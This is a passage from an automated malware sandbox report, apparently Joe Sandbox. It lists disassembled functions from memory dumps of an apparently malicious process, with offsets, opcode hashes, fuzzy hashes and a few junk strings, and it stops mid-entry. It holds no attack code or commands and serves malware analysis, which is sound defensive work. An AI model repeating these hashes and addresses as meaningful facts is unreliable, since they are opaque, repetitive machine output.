Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63a619f776ba403ebe36d65f577d2effb39b903abacd7131129db0d747f4b178
Instruction ID: dace3bb4e4f746ea6e4a60c921c835b17236e25b4264d9c71d0114c6f1d28761
Opcode Fuzzy Hash: 63a619f776ba403ebe36d65f577d2effb39b903abacd7131129db0d747f4b178
Instruction Fuzzy Hash: 75417922B1E5595EE744B7BCB0992FA7790EF853A5F0406BBD44DCB1D3DF1CA8428288

Function 00007FF848F3116D Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d777f9035ddfcc60970b0d686dd96db522f07ec96578c36429f417431aa80bc8
Instruction ID: da77c14ae05f2f48aac9ff89894eb46955ebe915e75274910d0c3c436ba233f5
Opcode Fuzzy Hash: d777f9035ddfcc60970b0d686dd96db522f07ec96578c36429f417431aa80bc8
Instruction Fuzzy Hash: 6631AF3190D64A8FEB45FB68C8599B97BF1FF5A350F0405BBD00AD72D2DB29A881C740

Function 00007FF848F30C25 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a6d0d7e6eecdc059178b5082ef6f5e8da73fc6d3a76445f9c5cff7b67addecf
Instruction ID: 241def57bfdcbb3564f029475846e7d632d080e5d2e657f6dab9ba820bb37674
Opcode Fuzzy Hash: 8a6d0d7e6eecdc059178b5082ef6f5e8da73fc6d3a76445f9c5cff7b67addecf
Instruction Fuzzy Hash: 3031E632D0D69ADEE311BB6898511EC7BA0EF823A1F1442B7D448CA1C3DB3C2546C799

Function 00007FF848F30998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 829cd6916d4bc1db017f75ff472dd9ee112a847720db24e264d4be89987560c5
Instruction ID: 9d7067dbad6463ea1661bb805aca4a58a1d4a0c5649b2b95dbba0c50236221b7
Opcode Fuzzy Hash: 829cd6916d4bc1db017f75ff472dd9ee112a847720db24e264d4be89987560c5
Instruction Fuzzy Hash: 0821F631B1DE191FE788F76C945A77976C2EB99791F4001BAE90EC33E3DE189C424285

Function 00007FF848F32BA7 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdafb7d14301b7a8762f9b68a5a35493ef70f9e55eac1225d7a12bbecd8120b8
Instruction ID: e5d38b5fb72e97e53a1074f689e57950da6ee6f8c61a0a5396679dd3bbaa9e34
Opcode Fuzzy Hash: fdafb7d14301b7a8762f9b68a5a35493ef70f9e55eac1225d7a12bbecd8120b8
Instruction Fuzzy Hash: 9021B730D089698FDBA4EB48C494BA9B3E2FB58351F5441EAC00EE7694DB74AD80CB45

Function 00007FF848F37376 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ffba572cfbc47e6d73800ab2143a4b795f7f5c1d83180a382118b091cf7537
Instruction ID: f80c4fa671fb758bc6df7c4e169921d92479349df42cc5388eabf1f2766f01e8
Opcode Fuzzy Hash: f8ffba572cfbc47e6d73800ab2143a4b795f7f5c1d83180a382118b091cf7537
Instruction Fuzzy Hash: B5115431E1C9198FE794F728C8556B876D1EF58380F5101BBD84ED32E2DF286D404689

Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e39f2f74d090d127083f434ae7cab474d82aa712f7905725aeb0103228bfa1e
Instruction ID: 20b86b293f29189ed15bc0effbe0aaf3233cff22707324240d52225c23bbe2d8
Opcode Fuzzy Hash: 9e39f2f74d090d127083f434ae7cab474d82aa712f7905725aeb0103228bfa1e
Instruction Fuzzy Hash: CF11A031E0D68D8FE702FB2898411AC7BB0EF82390F1541B3C844DB2D2DA3855068785

Function 00007FF848F30C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5049d59960c95d71b6439b1d7afe14823d8c2684a7422db5e7c2a4322fb8e18
Instruction ID: 6b8b55942b9aabc352e0cf82fe6e278102cb97d4ac58e5b11bd7c9de36e44f11
Opcode Fuzzy Hash: f5049d59960c95d71b6439b1d7afe14823d8c2684a7422db5e7c2a4322fb8e18
Instruction Fuzzy Hash: 9B11AD31E0D68D8FE702FB2898500AD7BB0EF82390F1541F7D844DB2D2DA386649CB85

Function 00007FF848F44511 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a321e5259d42d5283b0a0b99008d3a1288c2c283b0e52e309fea75377c26aec2
Instruction ID: 99f69c21d484315b15523d3d96fee5dd10975a57183f8210fda438233bf33361
Opcode Fuzzy Hash: a321e5259d42d5283b0a0b99008d3a1288c2c283b0e52e309fea75377c26aec2
Instruction Fuzzy Hash: 1D01F931E0DAC64FE751B32488642A93B92EFB1354F1802BBC04ED71D2DE1C99454356

Function 00007FF848F30C48 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bf36d6020becad6d9361ff571d087511b9d3d740d42621d1c9e514f898ef2e0
Instruction ID: 308d5f4b18b8f7ae12de221ef17799af10f96c4e33668227ce866e590cabf53c
Opcode Fuzzy Hash: 2bf36d6020becad6d9361ff571d087511b9d3d740d42621d1c9e514f898ef2e0
Instruction Fuzzy Hash: F0014835D0D289DFE716FB6888401AD7BB0EF82390F1541F7D844DB2D2DA386A49CB85

Function 00007FF848F30C50 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed87d68c6c47959c17f30311fc06c21540aa27be8aaa90562b60bcdfe4978380
Instruction ID: 2a5a3fa03c5b11e33eb31bc426a910c0c935cd64e69acd8e9bcc7b4b5bb853d6
Opcode Fuzzy Hash: ed87d68c6c47959c17f30311fc06c21540aa27be8aaa90562b60bcdfe4978380
Instruction Fuzzy Hash: BE011634D0D2899FE716FB6488941AD7BB0EF82394F1441F7D844DB2D2DA386A458785

Function 00007FF848F373CE Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c43b8144e0c92ad10de4a3a47d61e626731de3e5266ba07dc53dcc74846e3ec1
Instruction ID: 0f623bd71c1d0627ec64bd9e53ddeb7cd5982f7d09f3d321edb0eebb224106ef
Opcode Fuzzy Hash: c43b8144e0c92ad10de4a3a47d61e626731de3e5266ba07dc53dcc74846e3ec1
Instruction Fuzzy Hash: 1801CD31D5C81E8FEB94FB14D8557F872A1EB55351F1140BAD84ED31E2DF286D818A48

Function 00007FF848F36EE8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6aeec13845af2f53f077f301041bd6a6be401a36209cc8f6e0ff845423fb2c6
Instruction ID: 03275bc3dc22b49dbf0508bf3efc332aab18c61863bfb2fe35c94f12df8fb206
Opcode Fuzzy Hash: b6aeec13845af2f53f077f301041bd6a6be401a36209cc8f6e0ff845423fb2c6
Instruction Fuzzy Hash: 26F0DA31A0C80A5FEA94F72C94596B863D2EFD83A0F0941B7D80DD72D6EE18A8824744

Function 00007FF848F37408 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df188726e69e49b1a523e0ce474c9b9b82e8aab567bb001305f47ea735b6bdb
Instruction ID: e248ef353c9b213486047315d3328174b1d1d5a1ee6628783d64f576ddc6523f
Opcode Fuzzy Hash: 7df188726e69e49b1a523e0ce474c9b9b82e8aab567bb001305f47ea735b6bdb
Instruction Fuzzy Hash: 14F0D031E0C8198FEA94F714D8547F82391AF99350F1141BBDC8ED32E2DF286D814689

Function 00007FF848F30B77 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d60fd90d157bd0d449b78653439052b65d16bd1deeb035aa5d267f866c9284d6
Instruction ID: d6dfd882f4c151bd7db68b5324e20095532347af932dc2beb8f4931c69d6c243
Opcode Fuzzy Hash: d60fd90d157bd0d449b78653439052b65d16bd1deeb035aa5d267f866c9284d6
Instruction Fuzzy Hash: F4F0E53511E549CFC745EB38D8A54D4BF60FF03214B9A12EAD089C75A2E311485DC700

Function 00007FF848F331B5 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33de775bbd7bef66a931ce5809a350eae996187664e1c407572c182e1064fb41
Instruction ID: 3ede20a0eebc26917190d8ee49edfa7990c6ad41595bd54ad4cec6905ed2997e
Opcode Fuzzy Hash: 33de775bbd7bef66a931ce5809a350eae996187664e1c407572c182e1064fb41
Instruction Fuzzy Hash: C5F08230D0D9634FE355FB2488256AE76E2AF80254F4501B5D44DD71D7EF1C6D424395

Function 00007FF848F446FD Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c45cdb7c8eebcf94585e65e33085daf485201ffa9ecc6014a162f2910720ef9
Instruction ID: a25acce56357fb3b45690b1711c335ac65f1713a7a981ad5d28370016a4a1ded
Opcode Fuzzy Hash: 6c45cdb7c8eebcf94585e65e33085daf485201ffa9ecc6014a162f2910720ef9
Instruction Fuzzy Hash: 49F06531A0C54A4FEA18FF08D880AB97391FF34754F114577E84AE31D6EF28A8019688

Function 00007FF848F45520 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63e7d70bb8e6842df324291e8489fd40d0ccbde6413a3a917b04732a94292240
Instruction ID: c9d6280ddb2d21903f7e574f046bbb6603db427326115236a1d95eb96fd9b01d
Opcode Fuzzy Hash: 63e7d70bb8e6842df324291e8489fd40d0ccbde6413a3a917b04732a94292240
Instruction Fuzzy Hash: 6CD05E30B609494B8B0CB62D8458430F3D6E7AA20AB945278940BC2281EE25ECC68B84

Function 00007FF848F45180 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f40000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf526c727a200d67b7dc7eb06edb6a6cb44d31c04c12d85fe8f15c5aae398ef4
Instruction ID: 8eec10f30a0b111d9afc70fbbec5301b1b2d10d3ebac2d1aa9af4f5331ee89f8
Opcode Fuzzy Hash: bf526c727a200d67b7dc7eb06edb6a6cb44d31c04c12d85fe8f15c5aae398ef4
Instruction Fuzzy Hash: 5DD05E30B6090D4B8B0CB62D8458430F3D1E7AA6067D452B8940BC2281ED25ECC68B84

Function 00007FF848F36E6A Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a380cd7d0d4970fbf344f8d6e516afdc27446f02f593f61e45bc23ac6242da30
Instruction ID: f2e75a3d79b5f36443f394a7069f6f9b2ad6cc5c0dd5ddf3dba5bdc8831c8d81
Opcode Fuzzy Hash: a380cd7d0d4970fbf344f8d6e516afdc27446f02f593f61e45bc23ac6242da30
Instruction Fuzzy Hash: 91E01234D0C01A4BF799B344D8517E96290EB88340F1450BADA1ED33C5EE38AF448B49

Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction ID: 0d86a8cc8d3c854d13589092fdf05be0ba7e95fc4eb6bd462a5676def97b0342
Opcode Fuzzy Hash: 4fe8795a272dadb8bb6af11d3dcbc5c65920d5c2da652ffeffb3a97b9837552e
Instruction Fuzzy Hash: 9EC08C20D2F80F0AF405B32E14020ACA1005BC4390FD001B3C80C401C5AE0D21C5026E

Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction ID: c5f6d50508a4809d876c37d1e3f8c86f013ae2530f61b38e5336eaeb995bd724
Opcode Fuzzy Hash: a967f3c778237060e295b8758f84fd0012577d6ea661a812beb46ef2f8a89ce6
Instruction Fuzzy Hash: C7B01210C7F44F05E408337A084206970405B84244FC001F2D80C501C1994D1094036A

Function 00007FF848F34B95 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction ID: 10482da17dc50666d7944edef1e2c6e5ccdff4e75df360de3bf34439f11fe778
Opcode Fuzzy Hash: 9fa913ab83c13ea269090e6e9798ac3dd922ec5946686a66c3bd59b216f50c34
Instruction Fuzzy Hash:

Non-executed Functions

Function 00007FF848F309B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON

Download Yara Rule

Strings

#{9, xrefs: 00007FF848F30B3E
!k9, xrefs: 00007FF848F30B4E
c9, xrefs: 00007FF848F30B56
"s9, xrefs: 00007FF848F30B46

Memory Dump Source

Source File: 0000001B.00000002.2286352554.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_7ff848f30000_Idle.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction ID: 70d13471ac54828c3a83f4fd5d5ce9033454167d368661a65340fac12893f821
Opcode Fuzzy Hash: 363e173b441e8781b69fcc595ceb6685bdfc454e08dbee62e5043189dddcb4a7
Instruction Fuzzy Hash: 33413A16A2F46AA9E65137BD74521FE6B64EF812B9F084377E44C8D1C38E0C608682FD

Analysis Process: jmfWpjtPWHWFodUifDHiQtgxi.exePID: 4760, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F30D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FF848F30DF3

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: cf15937bc41bdb981418c63f0e99403e6257ef11ccb51e370713129e5e898ad6
Instruction ID: dd8847137eb1ca63a29f35615d8f884693914652318a125c841655d0a955635a
Opcode Fuzzy Hash: cf15937bc41bdb981418c63f0e99403e6257ef11ccb51e370713129e5e898ad6
Instruction Fuzzy Hash: 5691CE7191DA8E9FE789EB2888293A97FE1FB96384F4001BBC009D72D6CF791815C715

Function 00007FF848F30E43 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7314d2173e3806c7eeb7fbc037a45d5b61aa2b3808ccd29cecfdea7e4fa9f8bf
Instruction ID: 2b0dbc1d058aa981deb26c499d111adde7610ca6c0817bab8a2515a266cca78d
Opcode Fuzzy Hash: 7314d2173e3806c7eeb7fbc037a45d5b61aa2b3808ccd29cecfdea7e4fa9f8bf
Instruction Fuzzy Hash: 3551BD71A19A4E8EE388EB2888697B9BFE0FB86394F4002BBC009D37D5CF791455C714

Function 00007FF848F44069 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

K_H, xrefs: 00007FF848F44074

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID: K_H
API String ID: 0-313846638
Opcode ID: a874a2a7493f8ad589c982a08111da40384bd0ba6e47c9a0899bfbcccac1e2c4
Instruction ID: a10e723d4929508b6a65583f37f103608a52f10a45543a857b069c646f5b36ea
Opcode Fuzzy Hash: a874a2a7493f8ad589c982a08111da40384bd0ba6e47c9a0899bfbcccac1e2c4
Instruction Fuzzy Hash: DBF0E771A0851B8FEB58EF48C858AFE73B1FB64745F00013AD416E62D5DF7969448784

Function 00007FF848F41242 Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f40000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bab888318de6f242177df871908f504d0332b7bc18fd8898b702961da81b85c8
Instruction ID: f480afefeec2588c15b00bcf1f72f9ecee1d9661f553cd7cca8cf9f797d2565f
Opcode Fuzzy Hash: bab888318de6f242177df871908f504d0332b7bc18fd8898b702961da81b85c8
Instruction Fuzzy Hash: 3522A331E1C95A9FE798FB2884516B573A1FFA8780F1405BAD40ED32C7DF38A8868745

Function 00007FF848F308D0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3813622431134988b98ebb9f2b08b14f4fe1c2a0df4d2bee531bfa9cc677bab3
Instruction ID: 8f00fe4507a08955cc36cc3a5f16f4c9749a681f0055be8cc05f679f0cd3b581
Opcode Fuzzy Hash: 3813622431134988b98ebb9f2b08b14f4fe1c2a0df4d2bee531bfa9cc677bab3
Instruction Fuzzy Hash: 5A414932B1E9195EE744B77CA0952FA7790EF853A5F0402BBD44DCB1D7DE1CA8428298

Function 00007FF848F3116D Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d26b3a4062f31be598c1caacfe2a58a346837d63fc57b5f96daec34f10ed6b
Instruction ID: 8fde32649b634fbccbae43c50ed38e64f8788d7fb0bc32593a973624c51db9be
Opcode Fuzzy Hash: 86d26b3a4062f31be598c1caacfe2a58a346837d63fc57b5f96daec34f10ed6b
Instruction Fuzzy Hash: 8B31AF3190D64A8FEB45FB68C8699B97BF1FF5A350F0405BBD00AD72D2DB29A881C740

Function 00007FF848F30C25 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa7d2805dcf01c0d23b4d79278bb61cbde4edfbe542c8672ebe36155ff327684
Instruction ID: beb6b24e6b246c2cf7024e962d20ff9eac699c9be0c31c77ded4722feddb3c2f
Opcode Fuzzy Hash: aa7d2805dcf01c0d23b4d79278bb61cbde4edfbe542c8672ebe36155ff327684
Instruction Fuzzy Hash: C831E631D0D69ADEE311BB6898511EC7BA0EF823E5F1442B7D448CA1C3DB3C2546C799

Function 00007FF848F30998 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33317b84dc4b4eb597f23139ce0d5b5ceb77ec6c398f6f2cc4813e628c28631a
Instruction ID: 629752078bbfb05c3309132ffc1ebed02b6816931e7120f6a24970fe838c033d
Opcode Fuzzy Hash: 33317b84dc4b4eb597f23139ce0d5b5ceb77ec6c398f6f2cc4813e628c28631a
Instruction Fuzzy Hash: 4821D430B1DE190FE788B76C945A77972C6EB993A5F4400BAE80EC33E7DE189C424295

Function 00007FF848F32BA7 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76cde9c1b0f88f5b55404c793f94b5cf0a59d24ba9471ca8a80d0d820686c73a
Instruction ID: fac9a3041f7ae1245201175a1af048b1b41532ae0cc5f13845aa6095c90cf5fe
Opcode Fuzzy Hash: 76cde9c1b0f88f5b55404c793f94b5cf0a59d24ba9471ca8a80d0d820686c73a
Instruction Fuzzy Hash: EE21B730D089698FDBA4EB48C494BA9B3E2FB58355F5441EAC00EE7694DB78AD80CB45

Function 00007FF848F37376 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ffba572cfbc47e6d73800ab2143a4b795f7f5c1d83180a382118b091cf7537
Instruction ID: f80c4fa671fb758bc6df7c4e169921d92479349df42cc5388eabf1f2766f01e8
Opcode Fuzzy Hash: f8ffba572cfbc47e6d73800ab2143a4b795f7f5c1d83180a382118b091cf7537
Instruction Fuzzy Hash: B5115431E1C9198FE794F728C8556B876D1EF58380F5101BBD84ED32E2DF286D404689

Function 00007FF848F30C38 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ff848f30000_jmfWpjtPWHWFodUifDHiQtgxi.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e39f2f74d090d127083f434ae7cab474d82aa712f7905725aeb0103228bfa1e
Instruction ID: 20b86b293f29189ed15bc0effbe0aaf3233cff22707324240d52225c23bbe2d8
Opcode Fuzzy Hash: 9e39f2f74d090d127083f434ae7cab474d82aa712f7905725aeb0103228bfa1e
Instruction Fuzzy Hash: CF11A031E0D68D8FE702FB2898411AC7BB0EF82390F1541B3C844DB2D2DA3855068785

Function 00007FF848F30C40 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2293374754.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

